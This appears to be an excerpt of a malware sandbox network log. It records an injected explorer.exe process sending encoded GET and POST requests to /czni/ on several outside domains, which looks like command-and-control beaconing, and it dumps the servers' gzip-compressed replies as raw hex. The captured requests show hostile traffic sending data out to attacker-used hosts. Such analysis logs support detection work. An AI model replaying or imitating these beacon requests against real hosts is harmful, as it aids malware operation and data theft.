                                                                          Jan 30, 2023 13:41:24.699037075 CET862INData Raw: 6f 19 69 15 ae 3d c0 6e 77 50 d2 de c5 4e df c6 6e ef a4 d1 2a 69 f2 14 20 ab cd d1 69 72 fb 3d 0c 25 25 ce a0 9f 4b 82 b6 5e 1f f7 fa 86 cc 30 c8 ed 6a 0f b1 8d 07 ee a9 75 ca b7 45 b0 4a bf 9c 10 dc c7 50 e2 e1 38 6e 2e d8 79 78 80 43 c1 79 70
                                                                          Data Ascii: oi=nwPNn*i ir=%%K^0juEJP8n.yxCyp>`-RS#8!] C3rNI!#.vf%4%q\X9a)M/6~@a8B?X"iCY;wubfU@<f
                                                                          Jan 30, 2023 13:41:24.699065924 CET863INData Raw: 60 b0 ed ae db 1d 76 7d 5d f0 aa ab 9d 91 9d db e7 6c 36 53 af c1 99 05 e8 ea ba d2 13 31 ca 9a c0 64 b2 1a f0 bc 31 ab 25 45 3e 09 fd 8e 0d 17 19 ba 44 df 21 b8 89 a8 36 c7 ea 76 bb 79 db de 73 b1 fc 55 89 b1 2a 75 90 af 60 6a af 65 56 7c 30 0b
                                                                          Data Ascii: `v}]l6S1d1%E>D!6vysU*u`jeV|0#i]M=,89}V(w&VN'6NSJ4.!Y$LEL:[rL*S.q=5:Sv)PXgt5!<7g;,N*Y#fO
                                                                          Jan 30, 2023 13:41:24.700861931 CET864INData Raw: 56 0f 3c ec 9d 6c ee e9 e1 75 1f 0c 5e f0 60 7b 46 29 19 31 73 af 3e 24 0e d2 2a 0b 7e e0 67 d2 78 b0 fb 63 f0 1c c0 2c 16 3c 8f d4 61 6b ce b6 86 37 c6 b0 9e 4e d7 1a 19 a3 11 fc 76 81 2f 78 ac 3e a1 6a 78 0e 2e d7 8c e2 f8 a5 a7 66 5b 0a 6c 97
                                                                          Data Ascii: V<lu^`{F)1s>$*~gxc,<ak7Nv/x>jx.f[l@7f!~X8rXhldyhs5YZ_pfxceu%#E#A>\Z#S?
                                                                          Jan 30, 2023 13:41:24.716567993 CET865INData Raw: 28 68 4e 3e 6d 7d eb 31 e3 e6 66 bd de e0 e5 99 a7 85 e8 b1 eb ca 81 05 e2 a6 71 8a e0 ee d1 09 85 6c 5f 8c bb cd cd bd e6 e6 7e 73 f3 61 73 f3 51 43 b3 31 cb ab 85 50 a5 0a 4a 12 2c b7 67 32 67 e1 69 53 3a e9 14 9c 36 f5 01 82 d2 a6 16 50 6c da
                                                                          Data Ascii: (hN>m}1fql_~sasQC1PJ,g2giS:6PlMZ Q}8.mjFM-&R#CH8F$qI7/uy'j8Qrn9Q7yN<'D^_0;PA<C2>\<>tK%g|]V2G:`!}qq`<
                                                                          Jan 30, 2023 13:41:24.716615915 CET866INData Raw: 34 09 52 01 94 3d 9b db 9b 75 5d 9b 2f aa 7d c7 a5 41 2a 23 88 bb eb 59 01 77 bc 4b 75 e1 b3 25 d3 6b 52 ac 92 5f 4b 0e 6b c6 88 1c 30 fd 70 7a f9 f4 8c 4c 1e ca 5f 6c 88 ae f3 40 9b d3 20 dd 8e 3c 95 67 85 5b 03 39 8b cd 4a f0 a3 60 13 21 d4 f1
                                                                          Data Ascii: 4R=u]/}A*#YwKu%kR_Kk0pzL_l@ <g[9J`!I(sW}3|WmW7i^yu3|W5sq*L|sb*\x46.N|}}~V|JR>HX_*(?>>+'vHIf]yoP{sj|nx
                                                                          Jan 30, 2023 13:41:24.805783033 CET868INData Raw: 64 36 31 0d 0a ec 5d fd 72 db b8 11 ff db 7a 0a 0c 3a ed b4 33 e1 a7 28 5b 4a 24 4e 13 27 97 fb 48 6e ee e2 dc 5d d3 7f 32 10 09 49 a8 29 82 07 82 96 9d 37 ea 6b f4 c9 3a 0b 80 14 48 4b 8a 62 59 b9 4e ed 78 26 92 00 10 dc 05 7e 58 2c 80 c5 6e 2b
                                                                          Data Ascii: d61]rz:3([J$N'Hn]2I)7k:HKbYNx&~X,n+8c%4`d-M00)z^F.+RI$<|x+%W'i~K/:oh~x"c:@9*#/(F.(2H^%E"/$('K:`je=wS#)Y
                                                                          Jan 30, 2023 13:41:24.823844910 CET869INData Raw: 9f 0e ab 87 ca 6a aa c2 0f 25 19 4b 2e 1d c9 64 46 51 3d 8a 25 5d 3a 2c 4f e1 38 19 ce ac 66 a4 44 33 02 f1 42 ae 04 cf 9d 94 af 72 53 52 47 54 e4 b9 a3 6a 99 e0 00 c7 bd 93 93 93 5b 72 58 8f 8b 75 d8 9c b5 08 38 81 e2 d3 4a 4a 9e 6f 18 49 eb 27
                                                                          Data Ascii: j%K.dFQ=%]:,O8fD3BrSRGTj[rXu8JJoI'V]!"qQKQIS"`^"dwh8NiCkntq*Sd\BC9zfU1-qgl,^v`h8R7!$:OEdNW~|,J{l,z8/1S]f%
                                                                          Jan 30, 2023 13:41:24.853339911 CET870INHTTP/1.1 404 Not Found
                                                                          Connection: close
                                                                          x-powered-by: PHP/7.4.33
                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                                          content-type: text/html; charset=UTF-8
                                                                          link: <https://lakeviewautomation.com/wp-json/>; rel="https://api.w.org/"
                                                                          transfer-encoding: chunked
                                                                          content-encoding: gzip
                                                                          vary: Accept-Encoding
                                                                          date: Mon, 30 Jan 2023 12:41:24 GMT
                                                                          server: LiteSpeed
                                                                          Data Raw: 31 36 33 34 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b4 5c 6d 73 db b6 b2 fe 5c ff 0a 44 9a da 62 0a d2 24 f5 6a 2a 4a 6f 9b 34 73 3f f4 dc 76 4e db 3b 73 27 c9 74 20 12 92 d0 50 24 0f 08 59 72 54 fd f7 3b 0b 80 af a2 5e 2c b9 d5 b4 b5 80 dd 67 17 c0 02 bb 58 ac fd e6 d5 fb 5f de fd fe 7f bf fe 84 16 62 19 be bd 79 03 ff 43 21 89 e6 93 16 8d cc 3f 7e 6b 41 1b 25 c1 db 9b 6f de 2c a9 20 c8 5f 10 9e 52 31 69 fd f1 fb 07 73 d4 42 f7 79 4f 44 96 74 d2 7a 64 74 9d c4 5c b4 90 1f 47 82 46 62 d2 5a b3 40 2c 26 01 7d 64 3e 35 e5 17 8c 58 c4 04 23 a1 99 fa 24 a4 13 47 e2 28 01 12 e6 8e c7 d3 58 a4 77 39 c8 dd 92 6c 4c b6 24 73 6a 26 9c 82 10 2f 24 7c 4e ef 40 81 37 82 89 90 be fd 95 cc 29 8a 62 81 66 f1 2a 0a d0 6d 7b e4 3a ce 18 fd 4c be 50 f4 bf 8c ae d1 0f 2b 11 2f 09 11 2c 8e de dc 2b 9e 9b 37 21 8b be 20 4e c3 c9 5d 10 a5 00 3e a3 c2 5f dc a1 05 a7 b3 c9 dd fd 7d 48 be 48 79 44 32 03 af e5 c7 4b 25 37 e7 6d 91 50 50 1e 11 41 5b 48 3c 25 74 d2 22 49 12 32 5f ca ba e7 69 fa dd 66 19 b6 90 94 39 69 35 6a 84 6e 39 f9 cf 2a 1e a3 0f 94 06 2d 25 be b5 10 22 49 bd 43 4a dc cf 28 0d ee d5 dc fd 23 aa bc 8b 97 4b 1a 89 f4 39 3a f9 9a a7 ac 5c ea 73 96 88 b7 37 6b 16 05 f1 da fa 73 9d d0 65 fc 17 fb 8d 0a c1 a2 79 8a 26 68 db 9a 92 94 fe c1 c3 96 a7 07 fd e9 fe d3 7d 6a ad ad 98 cf 3f dd cb 95 4f 3f dd fb 31 a7 9f ee 25 f3 a7 7b a7 67 d9 96 fd e9 7e e8 6e 86 ee a7 fb 16 6e d1 8d 68 79 2d 2b 89 e6 2d dc 4a 1f e7 97 e1 a5 8f 73 89 96 3e ce 7f 52 80 e9 a3 04 8c 57 dc a7 2d 6f db f2 e3 c8 27 42 aa a1 f5 f5 40 dd 66 53 f9 74 bf 4e 4c 16 f9 e1 2a a0 e9 a7 fb bf 52 d9 20 99 4d 4e 43 4a 52 6a 2d 59 64 fd 95 7e ff 48 f9 64 60 39 96 d3 da ed c6 37 f7 af 5f a1 df 17 2c 45 33 16 52 c4 52 04 26 68 ce 69 44 39 11 34 40 af ef 6f 5e cd 56 91 0f 36 d9 a1 98 60 61 6c 1f 09 47 11 e6 38 c6 6c 42 2c 9f 53 22 e8 4f 21 85 55 ec b4 7c 12 3d 92 b4 65 e0 64 c2 ac 39 15 ef 60 87 6e c4 ed 6d f9 5b a7 e5 06 2d 63 9c 01 a3 b4 43 33 60 32 f9 4d 70 16 cd ad 19 8f 97 ef 16 84 bf 8b 03 8a e9 a4 93 58 7e 48 09 ff 37 f5 45 c7 c6 36 66 96 da e6 cc 5a 50 36 5f 08 03 27 d6 8c 85 e1 ef 74 23 3a c4 82 bd f1 d4 11 0b 96 62 6a 60 1b db 06 66 96 88 df 13 41 fe f8 f7 cf 1d c3 18 73 2a 56 3c 42 97 e3 0a 8d 4b 27 93 49 05 7b 97 0f cc ef 50 35 5f 62 7f a6 94 c1 b6 8c b1 b0 52 ee 4f 28 16 56 40 67 94 4f 84 a5 b6 37 cc db fd 5f e4 91 68 4a 4c 60 42 f5 4c a7 3f 3e fd 4e e6 ff 43 96 b4 d3 82 c3 b3 65 7c b4 3f c3 a8 69 14 bc 5b b0 30 e8 08 63 37 8b 79 27 9e fc c0 39 79 ea b4 66 21 01 0b 53 16 65 60 61 a5 ab 04 4e d1 74 b2 a5 8f 94 3f 89 05 8b e6 de 2b 1b 17 df 7e da f8 34 11 1f 42 02 ed 3b cc 27 f6 98 bf 89 ad 90 46 73 b1 18 f3 ef be 33 0a 94 8f f1 47
                                                                          Data Ascii: 1634\ms\Db$j*Jo4s?vN;s't P$YrT;^,gX_byC!?~kA%o, _R1isByODtzdt\GFbZ@,&}d>5X#$G(Xw9lL$sj&/$|N@7)bf*m{:LP+/,+7! N]>_}HHyD2K%7mPPA[H<%t"I2_if9i5jn9*-%"ICJ(#K9:\s7ksey&h}j?O?1%{g~nnhy-+-Js>RW-o'B@fStNL*R MNCJRj-Yd~Hd`97_,E3RR&hiD94@o^V6`alG8lB,S"O!U|=ed9`nm[-cC3`2MpX~H7E6fZP6_'t#:bj`fAs*V<BK'I{P5_bRO(V@gO7_hJL`BL?>NCe|?i[0c7y'9yf!Se`aNt?+~4B;'Fs3G
                                                                          Jan 30, 2023 13:41:24.915426970 CET872INData Raw: fe f9 f3 24 1b 3a 0c 9c cd 3a c9 ed 6d b1 2c 46 ba 66 c2 5f 74 12 0b 86 f6 23 49 69 c8 22 3a 69 89 38 69 c1 ea c5 70 92 0f 6c 1b 75 dd 64 83 7e e0 8c 84 2d 4c 8d ad 4f 52 aa d4 f7 f4 a2 a5 9d 8f 8e 3b 7c 18 0d f1 a0 6f 77 1f f0 c8 b5 fb f8 61 f4
                                                                          Data Ascii: $::m,Ff_t#Ii":i8iplud~-LOR;|owaW?nJ;n;g\vmvh]\UI!0*~uj]1zX>ka8bc4RM0M{$]\%1vuBg6)z{[4+^
                                                                          Jan 30, 2023 13:41:24.930728912 CET873INData Raw: 8b ad 69 ae 13 93 04 70 fc 8a 05 5d 52 25 c1 6b db f6 d0 9f 92 71 73 b7 69 f2 f9 d4 b3 b1 e3 f6 b0 33 1a 1c a2 0a 08 ff 42 b9 e9 d8 00 37 98 12 e7 24 61 0e 6c 0f b1 33 38 45 ef 4a e0 3e 19 0d 4f 00 bb 76 06 fc 60 63 a7 db 2f 93 eb d3 50 fa 35 53
                                                                          Data Ascii: ip]R%kqsi3B7$al38EJ>Ov`c/P5SDlv#c&LN&lCCS: 5p8Mp$ypmXdU&S91+A54s7Mx 5-Vs`pI6<Ker3!RuQB6qyds


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          19192.168.2.549729142.44.131.17780C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:27.039952993 CET886OUTGET /czni/?z8rul-n=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1RGWmrSHwVxpGmpQ==&20=4xfPiv3RnE HTTP/1.1
                                                                          Host: www.lakeviewautomation.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Jan 30, 2023 13:41:27.560183048 CET886INHTTP/1.1 301 Moved Permanently
                                                                          Connection: close
                                                                          x-powered-by: PHP/7.4.33
                                                                          expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          cache-control: no-cache, must-revalidate, max-age=0
                                                                          content-type: text/html; charset=UTF-8
                                                                          x-redirect-by: WordPress
                                                                          location: http://lakeviewautomation.com/czni/?z8rul-n=Pl1f6CcPgRBbBLamGgJlBKsDaKeibUUROb0ghzsubaIK3xnCplVa9FjztovwbGNPlK34MFgEpzS+BZjpXc1RGWmrSHwVxpGmpQ==&20=4xfPiv3RnE
                                                                          content-length: 0
                                                                          date: Mon, 30 Jan 2023 12:41:27 GMT
                                                                          server: LiteSpeed


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          2192.168.2.549709194.58.112.17480C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:40:00.713613987 CET754OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.toporsche.online
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.toporsche.online
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.toporsche.online/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 4a 36 6d 77 72 74 4a 74 65 61 62 54 6c 53 30 52 34 73 49 45 37 78 6d 69 6d 35 6d 6c 4a 41 7e 4e 56 75 70 7a 34 75 71 62 34 73 54 4c 54 42 43 56 46 71 4e 45 74 4f 4d 49 64 43 7e 6e 74 77 47 79 48 5a 79 63 6c 58 54 77 56 54 67 61 78 64 79 43 45 4e 54 71 56 6a 75 79 38 6a 39 46 53 71 31 65 6c 76 53 74 72 66 41 78 62 63 57 36 39 53 39 70 71 36 69 43 30 53 72 66 6d 76 46 72 7a 61 78 55 4f 31 54 70 51 4b 57 4d 76 61 62 6a 6d 58 7a 43 6f 30 65 62 44 41 78 69 6a 75 52 64 45 2d 68 50 65 70 6b 49 31 79 61 35 36 41 6f 51 31 4f 48 4f 61 41 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=J6mwrtJteabTlS0R4sIE7xmim5mlJA~NVupz4uqb4sTLTBCVFqNEtOMIdC~ntwGyHZyclXTwVTgaxdyCENTqVjuy8j9FSq1elvStrfAxbcW69S9pq6iC0SrfmvFrzaxUO1TpQKWMvabjmXzCo0ebDAxijuRdE-hPepkI1ya56AoQ1OHOaA).
                                                                          Jan 30, 2023 13:40:00.773113966 CET755INHTTP/1.1 404 Not Found
                                                                          Server: nginx
                                                                          Date: Mon, 30 Jan 2023 12:40:00 GMT
                                                                          Content-Type: text/html
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Content-Encoding: gzip
                                                                          Data Raw: 65 32 64 0d 0a 1f 8b 08 00 00 00 00 00 00 03 dd 5a 6b 6f 1b d7 11 fd ee 5f 71 cd 02 22 69 73 77 2d 3b 01 6c 8b a4 ea d8 69 3e d4 49 8a c8 6e 51 08 2e 71 b9 bc 24 37 5a ee b2 bb 4b c9 8c 2d a0 b1 f3 44 8c 18 49 0b b4 08 fa 40 5b 14 fd 54 c0 cf 46 7e 48 fe 0b bb ff a8 67 e6 ee 2e 97 34 29 cb 8a d3 06 15 20 89 bc cf b9 33 67 ce cc 7d d4 8f 76 7c 3b 1a 0f 95 e8 47 03 b7 59 a7 bf c2 76 65 18 36 4a 4e d8 92 1d 39 8c 9c 4d 55 12 ae f4 7a 8d 52 30 2a a1 8d 92 9d 66 7d a0 22 29 ec be 0c 42 15 35 4a 97 2f fd c4 38 8d 3a 2e f5 e4 40 35 4a 43 19 6c 38 5e af 24 6c df 8b 94 87 46 81 ea 05 23 23 c0 98 d3 2d 37 1d b5 35 f4 83 a8 d0 74 cb e9 44 fd 46 47 6d 3a b6 32 f8 4b cd f1 9c c8 91 ae 11 da d2 55 8d 65 0c 11 39 91 ab 9a 5b 5b 5b 66 e4 a3 7f 68 f7 95 e9 7b ae e3 a9 ba a5 eb ea f8 b2 21 02 e5 36 4a 61 34 76 55 d8 57 0a d3 0c 54 c7 91 8d 92 74 dd 92 e8 07 aa 9b 0b cb c2 19 72 14 f9 a6 1d 86 98 62 d2 df c1 32 b2 d6 5d 09 b9 7c cf c4 9f d5 e5 92 20 fd 41 5d 03 d9 53 d6 55 83 1b 36 eb a1 1d 38 c3 a8 69 1d ab 1f 5d 3f 7f e1 dc a5 73 eb c7 ac 23 5b 8e d7 f1 21 6e 20 ed 8d 35 6e 70 d1 97 1d d1 10 dd 91 67 47 8e ef 55 aa d7 b6 57 8e 58 c7 ae 5c 69 1e b3 ea 56 3a 48 3a 98 c0 e2 d0 bc 51 9a 3f 4c a5 6c 0d a4 e7 74 55 18 99 ef 87 e5 6a 09 ed 55 10 f8 c1 01 3b d4 c4 32 fa 84 81 dd 28 15 07 82 55 32 2b 8f a2 2e 5b f9 a5 e5 22 c8 c0 70 a4 91 d0 48 f1 70 60 19 17 75 2e ca bb a0 cd ab 96 fd 50 32 53 a7 45 b2 a2 6e 3f 19 2d ed 6b 6d bf 33 ce bc b2 6d 0c 81 33 a1 ff b5 08 7a ad d4 d3 b8 8c 7d 6e f2 a9 d5 ee b5 5c a7 d7 8f 80 65 1a 4b 05 c5 71 b8 71 ab 95 56 d0 90 53 25 7a f4 d4 5f 3b ce e6 c2 ae 86 e7 47 24 52 a4 ae 62 a2 f8 77 f1 5e fc 34 7e 18 ef 8a f8 db f8 4e f2 1b 7c bc 1f ef 24 1f 26 37 f0 79 07 bf 7b f1 bd f8 0e 55 df 5b f2 da e1 70 a5 0e 26 d1 9c d3 36 c8 e3 32 3f eb 47 d1 30 3c 6b 59 20 0e 13 d4 a3 1d d9 f3 bb be eb fa 5b c2 f3 fd a1 02 c2 f1 01 3e 0c a4 ab 00 be 28 83 1e 11 52 ab 0d c6 da 28 35 df 7b f3 2d f3 bd cb 75 4b 36 eb 16 96 d0 ac cf ac a3 a7 5a ad 14 90 c6 56 20 87 43 8c 97 ea 76 b6 bc c5 14 d2 82 0b 83 cd 16 36 62 8b f4 fd 30 02 f7 19 61 24 23 c7 86 ee 67 66 9d 52 73 e6 10 64 a2 e5 89 22 66 8c 61 30 a3 95 16 d0 5d 7f b9 59 1f 2e ee db 51 da f9 c0 30 2f 6f a6 7a 3b 68 c6 3b da 52 f1 33 32 61 fc 8c cd fa f8 39 43 66 da 1e 2e 5a 71 7b 14 45 be 17 66 aa c6 92 0b a6 d7 95 10 50 7f 80 fe 5d 3f 68 b1 6d 95 67 13 c0 d2 8a d0 f9 40 b5 60 f5 81 74 d9 0e a9 3a f3 fe b9 ea d2 f6 6c 13 44 91 c2 10 43 d9 e9 c0 42 2d 97 f0 32 8b 37 0a 29 1a 73 d6 56 df 77 42 6b 15 a1 c5 de 68 2c 75 38 b4 cd 8b 38 4b 72 30 5c 41 9f 56 e8 8f 02 5b 35 32 11 28 96 94 9a bf a0 51 08 84 a2 b8 5e 72 97 a2 fc 1c 6c 0a 5e b8 ff 7a 3a fe 40 3a 79 48 ca 5c a5 20 ba 6e 60 79 6a cb 5a 1d 45 83 4c b2 b9 d2 53 3d 45 c5 d1 20 93 7c 89 8a 6c ac 4a 3a 3d af 11 42 51 5e a7 85 b1 f6 5f 68 fc 37 60 e2 df f1 43 91 7c 1c ef 25 9f 26 37 45 fc 20 63 83 a3 05 2f 0c 87 d2 9b 03 d7 61 e0 0f 7c 83 23 69 51 31 85 62 cd 49 21 64 02 76 2c 1a 26 73 6c ed de cc 98 2a 00 ae 02 78 9e ab 8a 93 fc 97 7c bd 7f 72 32 29 3b 2d 96 c2 ff 5b 8c 5b 46 dc 74 51 db e9 fd d8 ed 3d 5f 06 b7 dd 40 6a 53 54 45 ca 02 f1 5f a1 d5 6f a1 db 3b f1 a3 e4 06 e9 fb 43 fd 51 d8 22 73 c2 fe c9 45 5e c8 fa 5c c8 4a a9 b6 23 35 28 4e 3c 29 d5 26 c8 28 ce df 54 01 25 52 fb ce 65 e8 10 83 46 df d1 f0 e9 ac 13 db 17 88 d5 35 06 70 66 c7 6b b9 aa 1b 19 da b1 31 61 14 f8 5e ef c5 16 01
                                                                          Data Ascii: e2dZko_q"isw-;li>InQ.q$7ZK-DI@[TF~Hg.4) 3g}v|;GYve6JN9MUzR0*f}")B5J/8:.@5JCl8^$lF##-75tDFGm:2KUe9[[[fh{!6Ja4vUWTtrb2]| A]SU68i]?s#[!n 5npgGUWX\iV:H:Q?LltUjU;2(U2+.["pHp`u.P2SEn?-km3m3z}n\eKqqVS%z_;G$Rbw^4~N|$&7y{U[p&62?G0<kY [>(R(5{-uK6ZV Cv6b0a$#gfRsd"fa0]Y.Q0/oz;h;R32a9Cf.Zq{EfP]?hmg@`t:lDCB-27)sVwBkh,u88Kr0\AV[52(Q^rl^z:@:yH\ n`yjZELS=E |lJ:=BQ^_h7`C|%&7E c/a|#iQ1bI!dv,&sl*x|r2);-[[FtQ=_@jSTE_o;CQ"sE^\J#5(N<)&(T%ReF5pfk1a^
                                                                          Jan 30, 2023 13:40:00.773145914 CET756INData Raw: 0b 03 eb 36 c5 af 7f 00 ba 08 56 e0 b9 dd f8 3e 40 c6 23 4c f1 eb ac e7 6a e5 84 a3 b6 b6 77 2e 49 db 07 dd 0d 10 1e 3d 85 71 ff 04 13 3d 48 be 82 7f ec 26 5f c4 8f 44 4e aa 77 93 2f 74 74 a4 e2 ba 05 f6 4c c1 cc 11 6b 94 67 e4 05 6e e8 2a 19 8d
                                                                          Data Ascii: 6V>@#Ljw.I=q=H&_DNw/ttLkgn*s2ie;9;]hIr`$C/0MV,b?'$wt9R@?:/1~WQv`m1wd9&%=11@)kaZ
                                                                          Jan 30, 2023 13:40:00.773170948 CET758INData Raw: 70 70 62 8f 58 40 a9 0e 25 47 c5 d4 1e 5b 09 4e 95 78 af 50 38 f7 41 73 6c 14 10 e2 9e 22 ac 7c c6 29 10 0e 0c 18 e9 88 2c 47 45 fc 0d 77 43 3c d2 f9 17 a0 5d 03 25 e4 a7 14 94 54 e1 1b dc 24 15 fd 0e be 72 44 d6 05 88 8d 79 a8 ba 83 8f 1c dd 1e
                                                                          Data Ascii: ppbX@%G[NxP8Asl"|),GEwC<]%T$rDyP\ZQ5!i8s+(OC03X{]S<Fgusy%ozbW>ey]N5HVOQq"h\**Q@P[}dd,\q6e 6%:8


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          20192.168.2.54973064.34.68.1080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Jan 30, 2023 13:41:32.821962118 CET887OUTPOST /czni/ HTTP/1.1
                                                                          Host: www.dellaone.com
                                                                          Connection: close
                                                                          Content-Length: 189
                                                                          Cache-Control: no-cache
                                                                          Origin: http://www.dellaone.com
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Accept: */*
                                                                          Referer: http://www.dellaone.com/czni/
                                                                          Accept-Language: en-US
                                                                          Accept-Encoding: gzip, deflate
                                                                          Data Raw: 7a 38 72 75 6c 2d 6e 3d 6b 68 42 39 4a 32 34 33 36 2d 6e 34 51 4f 79 76 31 61 66 35 75 4a 4b 63 46 4f 75 33 65 52 79 75 34 61 4f 44 6a 4d 66 52 49 6a 39 76 6f 51 54 4c 53 4b 67 6c 4a 5f 54 5a 57 39 4b 7a 61 6a 49 45 38 72 46 38 4b 52 62 6b 72 57 68 75 74 38 36 68 32 6e 50 34 5a 68 35 6b 4d 33 30 47 68 4d 39 49 28 46 48 31 6f 4c 78 4e 75 38 77 79 4d 4f 53 54 64 46 32 41 64 5a 67 78 75 4f 43 74 76 51 58 6e 63 70 70 78 52 54 4b 73 4b 57 49 6d 41 59 58 52 79 6b 28 34 38 65 34 70 55 74 38 6b 77 4f 76 36 39 42 6c 41 6f 4f 44 68 74 45 31 6f 5a 61 7a 31 54 77 29 2e 00 00 00 00 00 00 00 00
                                                                          Data Ascii: z8rul-n=khB9J2436-n4QOyv1af5uJKcFOu3eRyu4aODjMfRIj9voQTLSKglJ_TZW9KzajIE8rF8KRbkrWhut86h2nP4Zh5kM30GhM9I(FH1oLxNu8wyMOSTdF2AdZgxuOCtvQXncppxRTKsKWImAYXRyk(48e4pUt8kwOv69BlAoODhtE1oZaz1Tw).
                                                                          Jan 30, 2023 13:41:33.633341074 CET889INHTTP/1.1 404 Not Found
                                                                          Date: Mon, 30 Jan 2023 12:41:32 GMT
                                                                          Server: Apache
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-UA-Compatible: IE=edge
                                                                          Link: <https://londondairysupply.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Vary: Accept-Encoding,User-Agent
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Raw: 33 65 30 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 68 74 6d 6c 22 20 6c 61 6e 67 3d 22 65 6e 2d 43 41 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 74 72 61 6e 73 6c 61 74 65 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 20 26 72 61 71 75 6f 3b 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4c 6f 6e 64 6f 6e 20 44 61 69 72 79 20 53 75 70 70 6c 79 20 26 72 61 71 75 6f 3b 20 43 6f 6d 6d 65 6e 74 73 20 46 65 65 64 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6c 6f 6e 64 6f 6e 64 61 69 72 79 73 75 70 70 6c 79 2e 63 6f 6d 2f 63 6f 6d 6d 65 6e 74 73 2f 66 65 65 64 2f 22 20 2f 3e 0a 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 34 2e 30 2e 30 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74
